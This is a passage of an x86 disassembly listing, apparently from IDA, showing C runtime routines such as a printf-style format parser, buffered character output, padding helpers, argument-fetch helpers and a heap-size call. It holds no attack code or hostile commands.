mov eax, [esi+8]
mov cl, byte ptr [ebp+arg_0]
mov [eax], cl
jmp short loc_41AACB
; ---------------------------------------------------------------------------
loc_41AAB7: ; CODE XREF: sub_41A9D8+79�j
push 1
lea eax, [ebp+arg_0]
pop edi
push edi
push eax
push ebx
call sub_41E3D1
add esp, 0Ch
mov [ebp+arg_4], eax
loc_41AACB: ; CODE XREF: sub_41A9D8+DD�j
cmp [ebp+arg_4], edi
pop edi
jz short loc_41AAD7
or dword ptr [esi+0Ch], 20h
jmp short loc_41AAE6
; ---------------------------------------------------------------------------
loc_41AAD7: ; CODE XREF: sub_41A9D8+F7�j
mov eax, [ebp+arg_0]
and eax, 0FFh
jmp short loc_41AAE9
; ---------------------------------------------------------------------------
loc_41AAE1: ; CODE XREF: sub_41A9D8+10�j
; sub_41A9D8+18�j ...
or al, 20h
mov [esi+0Ch], eax
loc_41AAE6: ; CODE XREF: sub_41A9D8+FD�j
or eax, 0FFFFFFFFh
loc_41AAE9: ; CODE XREF: sub_41A9D8+107�j
pop esi
pop ebx
pop ebp
retn
sub_41A9D8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41AAED proc near ; CODE XREF: sub_4163D7+28�p
; sub_416821+29�p ...
var_248 = byte ptr -248h
var_247 = byte ptr -247h
var_49 = byte ptr -49h
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = byte ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_16 = byte ptr -16h
var_15 = byte ptr -15h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 248h
push ebx
push esi
push edi
mov edi, [ebp+arg_4]
xor esi, esi
mov bl, [edi]
inc edi
test bl, bl
mov [ebp+var_C], esi
mov [ebp+var_14], esi
mov [ebp+arg_4], edi
jz loc_41B206
mov ecx, [ebp+var_10]
xor edx, edx
jmp short loc_41AB21
; ---------------------------------------------------------------------------
loc_41AB19: ; CODE XREF: sub_41AAED+713�j
mov ecx, [ebp+var_10]
mov esi, [ebp+var_30]
xor edx, edx
loc_41AB21: ; CODE XREF: sub_41AAED+2A�j
cmp [ebp+var_14], edx
jl loc_41B206
cmp bl, 20h
jl short loc_41AB42
cmp bl, 78h
jg short loc_41AB42
movsx eax, bl
mov al, ds:byte_427790[eax]
and eax, 0Fh
jmp short loc_41AB44
; ---------------------------------------------------------------------------
loc_41AB42: ; CODE XREF: sub_41AAED+40�j
; sub_41AAED+45�j
xor eax, eax
loc_41AB44: ; CODE XREF: sub_41AAED+53�j
movsx eax, ds:byte_4277B0[esi+eax*8]
sar eax, 4
cmp eax, 7 ; switch 8 cases
mov [ebp+var_30], eax
ja loc_41B1F5 ; default
jmp ds:off_41B20E[eax*4] ; switch jump
loc_41AB62: ; DATA XREF: .text:off_41B20E�o
or [ebp+var_10], 0FFFFFFFFh ; jumptable 0041AB5B case 1
mov [ebp+var_34], edx
mov [ebp+var_28], edx
mov [ebp+var_20], edx
mov [ebp+var_1C], edx
mov [ebp+var_4], edx
mov [ebp+var_24], edx
jmp loc_41B1F5 ; default
; ---------------------------------------------------------------------------
loc_41AB7D: ; CODE XREF: sub_41AAED+6E�j
; DATA XREF: .text:off_41B20E�o
movsx eax, bl ; jumptable 0041AB5B case 2
sub eax, 20h
jz short loc_41ABC0
sub eax, 3
jz short loc_41ABB7
sub eax, 8
jz short loc_41ABAE
dec eax
dec eax
jz short loc_41ABA5
sub eax, 3
jnz loc_41B1F5 ; default
or [ebp+var_4], 8
jmp loc_41B1F5 ; default
; ---------------------------------------------------------------------------
loc_41ABA5: ; CODE XREF: sub_41AAED+A4�j
or [ebp+var_4], 4
jmp loc_41B1F5 ; default
; ---------------------------------------------------------------------------
loc_41ABAE: ; CODE XREF: sub_41AAED+A0�j
or [ebp+var_4], 1
jmp loc_41B1F5 ; default
; ---------------------------------------------------------------------------
loc_41ABB7: ; CODE XREF: sub_41AAED+9B�j
or byte ptr [ebp+var_4], 80h
jmp loc_41B1F5 ; default
; ---------------------------------------------------------------------------
loc_41ABC0: ; CODE XREF: sub_41AAED+96�j
or [ebp+var_4], 2
jmp loc_41B1F5 ; default
; ---------------------------------------------------------------------------
loc_41ABC9: ; CODE XREF: sub_41AAED+6E�j
; DATA XREF: .text:off_41B20E�o
cmp bl, 2Ah ; jumptable 0041AB5B case 3
jnz short loc_41ABF1
lea eax, [ebp+arg_8]
push eax
call sub_41B2CC
test eax, eax
pop ecx
mov [ebp+var_20], eax
jge loc_41B1F5 ; default
or [ebp+var_4], 4
neg eax
loc_41ABE9: ; CODE XREF: sub_41AAED+111�j
mov [ebp+var_20], eax
jmp loc_41B1F5 ; default
; ---------------------------------------------------------------------------
loc_41ABF1: ; CODE XREF: sub_41AAED+DF�j
mov eax, [ebp+var_20]
movsx ecx, bl
lea eax, [eax+eax*4]
lea eax, [ecx+eax*2-30h]
jmp short loc_41ABE9
; ---------------------------------------------------------------------------
loc_41AC00: ; CODE XREF: sub_41AAED+6E�j
; DATA XREF: .text:off_41B20E�o
mov [ebp+var_10], edx ; jumptable 0041AB5B case 4
jmp loc_41B1F5 ; default
; ---------------------------------------------------------------------------
loc_41AC08: ; CODE XREF: sub_41AAED+6E�j
; DATA XREF: .text:off_41B20E�o
cmp bl, 2Ah ; jumptable 0041AB5B case 5
jnz short loc_41AC2B
lea eax, [ebp+arg_8]
push eax
call sub_41B2CC
test eax, eax
pop ecx
mov [ebp+var_10], eax
jge loc_41B1F5 ; default
or [ebp+var_10], 0FFFFFFFFh
jmp loc_41B1F5 ; default
; ---------------------------------------------------------------------------
loc_41AC2B: ; CODE XREF: sub_41AAED+11E�j
lea eax, [ecx+ecx*4]
movsx ecx, bl
lea eax, [ecx+eax*2-30h]
mov [ebp+var_10], eax
jmp loc_41B1F5 ; default
; ---------------------------------------------------------------------------
loc_41AC3D: ; CODE XREF: sub_41AAED+6E�j
; DATA XREF: .text:off_41B20E�o
cmp bl, 49h ; jumptable 0041AB5B case 6
jz short loc_41AC70
cmp bl, 68h
jz short loc_41AC67
cmp bl, 6Ch
jz short loc_41AC5E
cmp bl, 77h
jnz loc_41B1F5 ; default
or byte ptr [ebp+var_4+1], 8
jmp loc_41B1F5 ; default
; ---------------------------------------------------------------------------
loc_41AC5E: ; CODE XREF: sub_41AAED+15D�j
or [ebp+var_4], 10h
jmp loc_41B1F5 ; default
; ---------------------------------------------------------------------------
loc_41AC67: ; CODE XREF: sub_41AAED+158�j
or [ebp+var_4], 20h
jmp loc_41B1F5 ; default
; ---------------------------------------------------------------------------
loc_41AC70: ; CODE XREF: sub_41AAED+153�j
cmp byte ptr [edi], 36h
jnz short loc_41AC89
cmp byte ptr [edi+1], 34h
jnz short loc_41AC89
inc edi
inc edi
or byte ptr [ebp+var_4+1], 80h
mov [ebp+arg_4], edi
jmp loc_41B1F5 ; default
; ---------------------------------------------------------------------------
loc_41AC89: ; CODE XREF: sub_41AAED+186�j
; sub_41AAED+18C�j
mov [ebp+var_30], edx
loc_41AC8C: ; CODE XREF: sub_41AAED+6E�j
; DATA XREF: .text:off_41B20E�o
mov ecx, off_435C2C ; jumptable 0041AB5B case 0
mov [ebp+var_24], edx
movzx eax, bl
test byte ptr [ecx+eax*2+1], 80h
jz short loc_41ACB8
lea eax, [ebp+var_14]
push eax
push [ebp+arg_0]
movsx eax, bl
push eax
call sub_41B22E
mov bl, [edi]
add esp, 0Ch
inc edi
mov [ebp+arg_4], edi
loc_41ACB8: ; CODE XREF: sub_41AAED+1B0�j
lea eax, [ebp+var_14]
push eax
push [ebp+arg_0]
movsx eax, bl
push eax
call sub_41B22E
add esp, 0Ch
jmp loc_41B1F5 ; default
; ---------------------------------------------------------------------------
loc_41ACD0: ; CODE XREF: sub_41AAED+6E�j
; DATA XREF: .text:off_41B20E�o
movsx eax, bl ; jumptable 0041AB5B case 7
cmp eax, 67h
jg loc_41AEF8
cmp eax, 65h
jge loc_41AD7B
cmp eax, 58h
jg loc_41ADD9
jz loc_41AF6C
sub eax, 43h
jz loc_41AD9C
dec eax
dec eax
jz short loc_41AD71
dec eax
dec eax
jz short loc_41AD71
sub eax, 0Ch
jnz loc_41B0F7
test word ptr [ebp+var_4], 830h
jnz short loc_41AD1A
or byte ptr [ebp+var_4+1], 8
loc_41AD1A: ; CODE XREF: sub_41AAED+227�j
; sub_41AAED+42A�j
mov esi, [ebp+var_10]
cmp esi, 0FFFFFFFFh
jnz short loc_41AD27
mov esi, 7FFFFFFFh
loc_41AD27: ; CODE XREF: sub_41AAED+233�j
lea eax, [ebp+arg_8]
push eax
call sub_41B2CC
test word ptr [ebp+var_4], 810h
pop ecx
mov ecx, eax
mov [ebp+var_8], ecx
jz loc_41AF40
test ecx, ecx
jnz short loc_41AD4F
mov ecx, off_435C1C
mov [ebp+var_8], ecx
loc_41AD4F: ; CODE XREF: sub_41AAED+257�j
mov [ebp+var_24], 1
mov eax, ecx
loc_41AD58: ; CODE XREF: sub_41AAED+282�j
mov edx, esi
dec esi
test edx, edx
jz loc_41AF37
cmp word ptr [eax], 0
jz loc_41AF37
inc eax
inc eax
jmp short loc_41AD58
; ---------------------------------------------------------------------------
loc_41AD71: ; CODE XREF: sub_41AAED+212�j
; sub_41AAED+216�j
mov [ebp+var_34], 1
add bl, 20h
loc_41AD7B: ; CODE XREF: sub_41AAED+1F2�j
or [ebp+var_4], 40h
lea edi, [ebp+var_248]
cmp ecx, edx
mov [ebp+var_8], edi
jge loc_41AE5F
mov [ebp+var_10], 6
jmp loc_41AE6D
; ---------------------------------------------------------------------------
loc_41AD9C: ; CODE XREF: sub_41AAED+20A�j
test word ptr [ebp+var_4], 830h
jnz short loc_41ADA8
or byte ptr [ebp+var_4+1], 8
loc_41ADA8: ; CODE XREF: sub_41AAED+2B5�j
; sub_41AAED+2F4�j
test word ptr [ebp+var_4], 810h
lea eax, [ebp+arg_8]
push eax
jz short loc_41ADEF
call sub_41B2E9
push eax
lea eax, [ebp+var_248]
push eax
call sub_41E6A1
add esp, 0Ch
mov [ebp+var_C], eax
test eax, eax
jge short loc_41AE02
mov [ebp+var_28], 1
jmp short loc_41AE02
; ---------------------------------------------------------------------------
loc_41ADD9: ; CODE XREF: sub_41AAED+1FB�j
sub eax, 5Ah
jz short loc_41AE10
sub eax, 9
jz short loc_41ADA8
dec eax
jz loc_41AFD2
jmp loc_41B0F7
; ---------------------------------------------------------------------------
loc_41ADEF: ; CODE XREF: sub_41AAED+2C5�j
call sub_41B2CC
pop ecx
mov [ebp+var_248], al
mov [ebp+var_C], 1
loc_41AE02: ; CODE XREF: sub_41AAED+2E1�j
; sub_41AAED+2EA�j
lea eax, [ebp+var_248]
mov [ebp+var_8], eax
jmp loc_41B0F7
; ---------------------------------------------------------------------------
loc_41AE10: ; CODE XREF: sub_41AAED+2EF�j
lea eax, [ebp+arg_8]
push eax
call sub_41B2CC
test eax, eax
pop ecx
jz short loc_41AE51
mov ecx, [eax+4]
test ecx, ecx
jz short loc_41AE51
test byte ptr [ebp+var_4+1], 8
jz short loc_41AE42
movsx eax, word ptr [eax]
shr eax, 1
mov [ebp+var_8], ecx
mov [ebp+var_C], eax
mov [ebp+var_24], 1
jmp loc_41B0F7
; ---------------------------------------------------------------------------
loc_41AE42: ; CODE XREF: sub_41AAED+33C�j
and [ebp+var_24], 0
mov [ebp+var_8], ecx
movsx eax, word ptr [eax]
jmp loc_41B0F4
; ---------------------------------------------------------------------------
loc_41AE51: ; CODE XREF: sub_41AAED+32F�j
; sub_41AAED+336�j
mov eax, off_435C18
mov [ebp+var_8], eax
push eax
jmp loc_41AEED
; ---------------------------------------------------------------------------
loc_41AE5F: ; CODE XREF: sub_41AAED+29D�j
jnz short loc_41AE6D
cmp bl, 67h
jnz short loc_41AE6D
mov [ebp+var_10], 1
loc_41AE6D: ; CODE XREF: sub_41AAED+2AA�j
; sub_41AAED:loc_41AE5F�j ...
mov eax, [ebp+arg_8]
push [ebp+var_34]
add eax, 8
mov [ebp+arg_8], eax
push [ebp+var_10]
mov ecx, [eax-8]
mov [ebp+var_48], ecx
mov eax, [eax-4]
mov [ebp+var_44], eax
movsx eax, bl
push eax
lea eax, [ebp+var_248]
push eax
lea eax, [ebp+var_48]
push eax
call off_435BE8
mov esi, [ebp+var_4]
add esp, 14h
and esi, 80h
jz short loc_41AEBF
cmp [ebp+var_10], 0
jnz short loc_41AEBF
lea eax, [ebp+var_248]
push eax
call off_435BF4
pop ecx
loc_41AEBF: ; CODE XREF: sub_41AAED+3BC�j
; sub_41AAED+3C2�j
cmp bl, 67h
jnz short loc_41AED6
test esi, esi
jnz short loc_41AED6
lea eax, [ebp+var_248]
push eax
call off_435BEC
pop ecx
loc_41AED6: ; CODE XREF: sub_41AAED+3D5�j
; sub_41AAED+3D9�j
cmp [ebp+var_248], 2Dh
jnz short loc_41AEEC
or byte ptr [ebp+var_4+1], 1
lea edi, [ebp+var_247]
mov [ebp+var_8], edi
loc_41AEEC: ; CODE XREF: sub_41AAED+3F0�j
push edi
loc_41AEED: ; CODE XREF: sub_41AAED+36D�j
call sub_4158E0
pop ecx
jmp loc_41B0F4
; ---------------------------------------------------------------------------
loc_41AEF8: ; CODE XREF: sub_41AAED+1E9�j
sub eax, 69h
jz loc_41AFD2
sub eax, 5
jz loc_41AFA8
dec eax
jz loc_41AF95
dec eax
jz short loc_41AF65
sub eax, 3
jz loc_41AD1A
dec eax
dec eax
jz loc_41AFD6
sub eax, 3
jnz loc_41B0F7
mov [ebp+var_2C], 27h
jmp short loc_41AF73
; ---------------------------------------------------------------------------
loc_41AF37: ; CODE XREF: sub_41AAED+270�j
; sub_41AAED+27A�j
sub eax, ecx
sar eax, 1
jmp loc_41B0F4
; ---------------------------------------------------------------------------
loc_41AF40: ; CODE XREF: sub_41AAED+24F�j
test ecx, ecx
jnz short loc_41AF4D
mov ecx, off_435C18
mov [ebp+var_8], ecx
loc_41AF4D: ; CODE XREF: sub_41AAED+455�j
mov eax, ecx
loc_41AF4F: ; CODE XREF: sub_41AAED+46F�j
mov edx, esi
dec esi
test edx, edx
jz short loc_41AF5E
cmp byte ptr [eax], 0
jz short loc_41AF5E
inc eax
jmp short loc_41AF4F
; ---------------------------------------------------------------------------
loc_41AF5E: ; CODE XREF: sub_41AAED+467�j
; sub_41AAED+46C�j
sub eax, ecx
jmp loc_41B0F4
; ---------------------------------------------------------------------------
loc_41AF65: ; CODE XREF: sub_41AAED+425�j
mov [ebp+var_10], 8
loc_41AF6C: ; CODE XREF: sub_41AAED+201�j
mov [ebp+var_2C], 7
loc_41AF73: ; CODE XREF: sub_41AAED+448�j
test byte ptr [ebp+var_4], 80h
mov [ebp+var_C], 10h
jz short loc_41AFDD
mov al, byte ptr [ebp+var_2C]
mov [ebp+var_16], 30h
add al, 51h
mov [ebp+var_1C], 2
mov [ebp+var_15], al
jmp short loc_41AFDD
; ---------------------------------------------------------------------------
loc_41AF95: ; CODE XREF: sub_41AAED+41E�j
test byte ptr [ebp+var_4], 80h
mov [ebp+var_C], 8
jz short loc_41AFDD
or byte ptr [ebp+var_4+1], 2
jmp short loc_41AFDD
; ---------------------------------------------------------------------------
loc_41AFA8: ; CODE XREF: sub_41AAED+417�j
lea eax, [ebp+arg_8]
push eax
call sub_41B2CC
test byte ptr [ebp+var_4], 20h
pop ecx
jz short loc_41AFC1
mov cx, word ptr [ebp+var_14]
mov [eax], cx
jmp short loc_41AFC6
; ---------------------------------------------------------------------------
loc_41AFC1: ; CODE XREF: sub_41AAED+4C9�j
mov ecx, [ebp+var_14]
mov [eax], ecx
loc_41AFC6: ; CODE XREF: sub_41AAED+4D2�j
mov [ebp+var_28], 1
jmp loc_41B1F5 ; default
; ---------------------------------------------------------------------------
loc_41AFD2: ; CODE XREF: sub_41AAED+2F7�j
; sub_41AAED+40E�j
or [ebp+var_4], 40h
loc_41AFD6: ; CODE XREF: sub_41AAED+432�j
mov [ebp+var_C], 0Ah
loc_41AFDD: ; CODE XREF: sub_41AAED+491�j
; sub_41AAED+4A6�j ...
test byte ptr [ebp+var_4+1], 80h
jz short loc_41AFEF
lea eax, [ebp+arg_8]
push eax
call sub_41B2D9
pop ecx
jmp short loc_41B030
; ---------------------------------------------------------------------------
loc_41AFEF: ; CODE XREF: sub_41AAED+4F4�j
test byte ptr [ebp+var_4], 20h
jz short loc_41B016
test byte ptr [ebp+var_4], 40h
lea eax, [ebp+arg_8]
push eax
jz short loc_41B00B
call sub_41B2CC
pop ecx
movsx eax, ax
loc_41B008: ; CODE XREF: sub_41AAED+527�j
; sub_41AAED+539�j
cdq
jmp short loc_41B030
; ---------------------------------------------------------------------------
loc_41B00B: ; CODE XREF: sub_41AAED+510�j
call sub_41B2CC
pop ecx
movzx eax, ax
jmp short loc_41B008
; ---------------------------------------------------------------------------
loc_41B016: ; CODE XREF: sub_41AAED+506�j
test byte ptr [ebp+var_4], 40h
lea eax, [ebp+arg_8]
push eax
jz short loc_41B028
call sub_41B2CC
pop ecx
jmp short loc_41B008
; ---------------------------------------------------------------------------
loc_41B028: ; CODE XREF: sub_41AAED+531�j
call sub_41B2CC
pop ecx
xor edx, edx
loc_41B030: ; CODE XREF: sub_41AAED+500�j
; sub_41AAED+51C�j
test byte ptr [ebp+var_4], 40h
jz short loc_41B051
test edx, edx
jg short loc_41B051
jl short loc_41B040
test eax, eax
jnb short loc_41B051
loc_41B040: ; CODE XREF: sub_41AAED+54D�j
neg eax
adc edx, 0
mov esi, eax
neg edx
or byte ptr [ebp+var_4+1], 1
mov edi, edx
jmp short loc_41B055
; ---------------------------------------------------------------------------
loc_41B051: ; CODE XREF: sub_41AAED+547�j
; sub_41AAED+54B�j ...
mov esi, eax
mov edi, edx
loc_41B055: ; CODE XREF: sub_41AAED+562�j
test byte ptr [ebp+var_4+1], 80h
jnz short loc_41B05E
and edi, 0
loc_41B05E: ; CODE XREF: sub_41AAED+56C�j
cmp [ebp+var_10], 0
jge short loc_41B06D
mov [ebp+var_10], 1
jmp short loc_41B071
; ---------------------------------------------------------------------------
loc_41B06D: ; CODE XREF: sub_41AAED+575�j
and [ebp+var_4], 0FFFFFFF7h
loc_41B071: ; CODE XREF: sub_41AAED+57E�j
mov eax, esi
or eax, edi
jnz short loc_41B07B
and [ebp+var_1C], 0
loc_41B07B: ; CODE XREF: sub_41AAED+588�j
lea eax, [ebp+var_49]
mov [ebp+var_8], eax
loc_41B081: ; CODE XREF: sub_41AAED+5DD�j
mov eax, [ebp+var_10]
dec [ebp+var_10]
test eax, eax
jg short loc_41B091
mov eax, esi
or eax, edi
jz short loc_41B0CC
loc_41B091: ; CODE XREF: sub_41AAED+59C�j
mov eax, [ebp+var_C]
cdq
push edx
push eax
push edi
push esi
mov [ebp+var_40], eax
mov [ebp+var_3C], edx
call sub_4170E0
push [ebp+var_3C]
mov ebx, eax
add ebx, 30h
push [ebp+var_40]
push edi
push esi
call sub_417070
cmp ebx, 39h
mov esi, eax
mov edi, edx
jle short loc_41B0C2
add ebx, [ebp+var_2C]
loc_41B0C2: ; CODE XREF: sub_41AAED+5D0�j
mov eax, [ebp+var_8]
dec [ebp+var_8]
mov [eax], bl
jmp short loc_41B081
; ---------------------------------------------------------------------------
loc_41B0CC: ; CODE XREF: sub_41AAED+5A2�j
lea eax, [ebp+var_49]
sub eax, [ebp+var_8]
inc [ebp+var_8]
test byte ptr [ebp+var_4+1], 2
mov [ebp+var_C], eax
jz short loc_41B0F7
mov ecx, [ebp+var_8]
cmp byte ptr [ecx], 30h
jnz short loc_41B0EA
test eax, eax
jnz short loc_41B0F7
loc_41B0EA: ; CODE XREF: sub_41AAED+5F7�j
dec [ebp+var_8]
inc eax
mov ecx, [ebp+var_8]
mov byte ptr [ecx], 30h
loc_41B0F4: ; CODE XREF: sub_41AAED+35F�j
; sub_41AAED+406�j ...
mov [ebp+var_C], eax
loc_41B0F7: ; CODE XREF: sub_41AAED+21B�j
; sub_41AAED+2FD�j ...
cmp [ebp+var_28], 0
jnz loc_41B1F5 ; default
mov ebx, [ebp+var_4]
test bl, 40h
jz short loc_41B12F
test bh, 1
jz short loc_41B114
mov [ebp+var_16], 2Dh
jmp short loc_41B128
; ---------------------------------------------------------------------------
loc_41B114: ; CODE XREF: sub_41AAED+61F�j
test bl, 1
jz short loc_41B11F
mov [ebp+var_16], 2Bh
jmp short loc_41B128
; ---------------------------------------------------------------------------
loc_41B11F: ; CODE XREF: sub_41AAED+62A�j
test bl, 2
jz short loc_41B12F
mov [ebp+var_16], 20h
loc_41B128: ; CODE XREF: sub_41AAED+625�j
; sub_41AAED+630�j
mov [ebp+var_1C], 1
loc_41B12F: ; CODE XREF: sub_41AAED+61A�j
; sub_41AAED+635�j
mov esi, [ebp+var_20]
sub esi, [ebp+var_1C]
sub esi, [ebp+var_C]
test bl, 0Ch
jnz short loc_41B14F
lea eax, [ebp+var_14]
push eax
push [ebp+arg_0]
push esi
push 20h
call sub_41B263
add esp, 10h
loc_41B14F: ; CODE XREF: sub_41AAED+64E�j
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_16]
push [ebp+arg_0]
push [ebp+var_1C]
push eax
call sub_41B294
add esp, 10h
test bl, 8
jz short loc_41B181
test bl, 4
jnz short loc_41B181
lea eax, [ebp+var_14]
push eax
push [ebp+arg_0]
push esi
push 30h
call sub_41B263
add esp, 10h
loc_41B181: ; CODE XREF: sub_41AAED+67B�j
; sub_41AAED+680�j
cmp [ebp+var_24], 0
jz short loc_41B1C8
cmp [ebp+var_C], 0
jle short loc_41B1C8
mov eax, [ebp+var_C]
mov ebx, [ebp+var_8]
lea edi, [eax-1]
loc_41B196: ; CODE XREF: sub_41AAED+6D7�j
mov ax, [ebx]
inc ebx
push eax
lea eax, [ebp+var_38]
push eax
inc ebx
call sub_41E6A1
pop ecx
test eax, eax
pop ecx
jle short loc_41B1DD
lea ecx, [ebp+var_14]
push ecx
push [ebp+arg_0]
push eax
lea eax, [ebp+var_38]
push eax
call sub_41B294
add esp, 10h
mov eax, edi
dec edi
test eax, eax
jnz short loc_41B196
jmp short loc_41B1DD
; ---------------------------------------------------------------------------
loc_41B1C8: ; CODE XREF: sub_41AAED+698�j
; sub_41AAED+69E�j
lea eax, [ebp+var_14]
push eax
push [ebp+arg_0]
push [ebp+var_C]
push [ebp+var_8]
call sub_41B294
add esp, 10h
loc_41B1DD: ; CODE XREF: sub_41AAED+6BC�j
; sub_41AAED+6D9�j
test byte ptr [ebp+var_4], 4
jz short loc_41B1F5 ; default
lea eax, [ebp+var_14]
push eax
push [ebp+arg_0]
push esi
push 20h
call sub_41B263
add esp, 10h
loc_41B1F5: ; CODE XREF: sub_41AAED+68�j
; sub_41AAED+8B�j ...
mov edi, [ebp+arg_4] ; default
mov bl, [edi]
inc edi
test bl, bl
mov [ebp+arg_4], edi
jnz loc_41AB19
loc_41B206: ; CODE XREF: sub_41AAED+1F�j
; sub_41AAED+37�j
mov eax, [ebp+var_14]
pop edi
pop esi
pop ebx
leave
retn
sub_41AAED endp
; ---------------------------------------------------------------------------
off_41B20E dd offset loc_41AC8C ; DATA XREF: sub_41AAED+6E�r
dd offset loc_41AB62 ; jump table for switch statement
dd offset loc_41AB7D
dd offset loc_41ABC9
dd offset loc_41AC00
dd offset loc_41AC08
dd offset loc_41AC3D
dd offset loc_41ACD0
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B22E proc near ; CODE XREF: sub_41AAED+1BD�p
; sub_41AAED+1D6�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov ecx, [ebp+arg_4]
dec dword ptr [ecx+4]
js short loc_41B247
mov edx, [ecx]
mov al, byte ptr [ebp+arg_0]
mov [edx], al
inc dword ptr [ecx]
movzx eax, al
jmp short loc_41B252
; ---------------------------------------------------------------------------
loc_41B247: ; CODE XREF: sub_41B22E+9�j
push ecx
push [ebp+arg_0]
call sub_41A9D8
pop ecx
pop ecx
loc_41B252: ; CODE XREF: sub_41B22E+17�j
cmp eax, 0FFFFFFFFh
mov eax, [ebp+arg_8]
jnz short loc_41B25F
or dword ptr [eax], 0FFFFFFFFh
pop ebp
retn
; ---------------------------------------------------------------------------
loc_41B25F: ; CODE XREF: sub_41B22E+2A�j
inc dword ptr [eax]
pop ebp
retn
sub_41B22E endp
; =============== S U B R O U T I N E =======================================
sub_41B263 proc near ; CODE XREF: sub_41AAED+65A�p
; sub_41AAED+68C�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push esi
push edi
mov edi, [esp+8+arg_4]
mov eax, edi
dec edi
test eax, eax
jle short loc_41B291
mov esi, [esp+8+arg_C]
loc_41B274: ; CODE XREF: sub_41B263+2C�j
push esi
push [esp+0Ch+arg_8]
push [esp+10h+arg_0]
call sub_41B22E
add esp, 0Ch
cmp dword ptr [esi], 0FFFFFFFFh
jz short loc_41B291
mov eax, edi
dec edi
test eax, eax
jg short loc_41B274
loc_41B291: ; CODE XREF: sub_41B263+B�j
; sub_41B263+25�j
pop edi
pop esi
retn
sub_41B263 endp
; =============== S U B R O U T I N E =======================================
sub_41B294 proc near ; CODE XREF: sub_41AAED+670�p
; sub_41AAED+6CA�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push ebx
mov ebx, [esp+4+arg_4]
mov eax, ebx
dec ebx
push esi
push edi
test eax, eax
jle short loc_41B2C8
mov edi, [esp+0Ch+arg_C]
mov esi, [esp+0Ch+arg_0]
loc_41B2AA: ; CODE XREF: sub_41B294+32�j
movsx eax, byte ptr [esi]
push edi
inc esi
push [esp+10h+arg_8]
push eax
call sub_41B22E
add esp, 0Ch
cmp dword ptr [edi], 0FFFFFFFFh
jz short loc_41B2C8
mov eax, ebx
dec ebx
test eax, eax
jg short loc_41B2AA
loc_41B2C8: ; CODE XREF: sub_41B294+C�j
; sub_41B294+2B�j
pop edi
pop esi
pop ebx
retn
sub_41B294 endp
; =============== S U B R O U T I N E =======================================
sub_41B2CC proc near ; CODE XREF: sub_41AAED+E5�p
; sub_41AAED+124�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
add dword ptr [eax], 4
mov eax, [eax]
mov eax, [eax-4]
retn
sub_41B2CC endp
; =============== S U B R O U T I N E =======================================
sub_41B2D9 proc near ; CODE XREF: sub_41AAED+4FA�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
add dword ptr [eax], 8
mov ecx, [eax]
mov eax, [ecx-8]
mov edx, [ecx-4]
retn
sub_41B2D9 endp
; =============== S U B R O U T I N E =======================================
sub_41B2E9 proc near ; CODE XREF: sub_41AAED+2C7�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
add dword ptr [eax], 4
mov eax, [eax]
mov ax, [eax-4]
retn
sub_41B2E9 endp
; =============== S U B R O U T I N E =======================================
sub_41B2F7 proc near ; CODE XREF: sub_416773+7�p
; sub_416773+26�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push esi
call sub_418317
test eax, eax
pop ecx
jz short loc_41B30F
mov eax, [esi-4]
pop esi
sub eax, 9
retn
; ---------------------------------------------------------------------------
loc_41B30F: ; CODE XREF: sub_41B2F7+E�j
push esi
push 0
push dword_49426C
call ds:dword_495464 ; RtlSizeHeap
pop esi
retn
sub_41B2F7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B320 proc near ; CODE XREF: sub_416B36+2A�p
var_1C4 = byte ptr -1C4h
var_1C3 = byte ptr -1C3h
var_64 = byte ptr -64h
var_59 = byte ptr -59h
var_44 = dword ptr -44h
var_3E = word ptr -3Eh
var_3C = dword ptr -3Ch
var_38 = byte ptr -38h
var_37 = byte ptr -37h
var_35 = byte ptr -35h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_17 = byte ptr -17h
var_16 = byte ptr -16h
var_15 = byte ptr -15h
var_14 = dword ptr -14h
var_F = byte ptr -0Fh
var_E = byte ptr -0Eh
var_D = byte ptr -0Dh
var_C = dword ptr -0Ch
var_5 = byte ptr -5
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 1C4h
and [ebp+var_15], 0
push ebx
push esi
mov esi, [ebp+arg_4]
xor ebx, ebx
push edi
mov al, [esi]
mov [ebp+var_4], ebx
test al, al
mov [ebp+var_34], ebx
jz loc_41BD26
mov edi, [ebp+arg_0]
jmp short loc_41B34F
; ---------------------------------------------------------------------------
loc_41B34A: ; CODE XREF: sub_41B320+9CE�j
mov edi, [ebp+arg_0]
xor ebx, ebx
loc_41B34F: ; CODE XREF: sub_41B320+28�j
cmp dword_435E38, 1
jle short loc_41B367
movzx eax, al
push 8
push eax
call sub_41BDD1
pop ecx
pop ecx
jmp short loc_41B376
; ---------------------------------------------------------------------------
loc_41B367: ; CODE XREF: sub_41B320+36�j
mov ecx, off_435C2C
movzx eax, al
mov al, [ecx+eax*2]
and eax, 8
loc_41B376: ; CODE XREF: sub_41B320+45�j
cmp eax, ebx
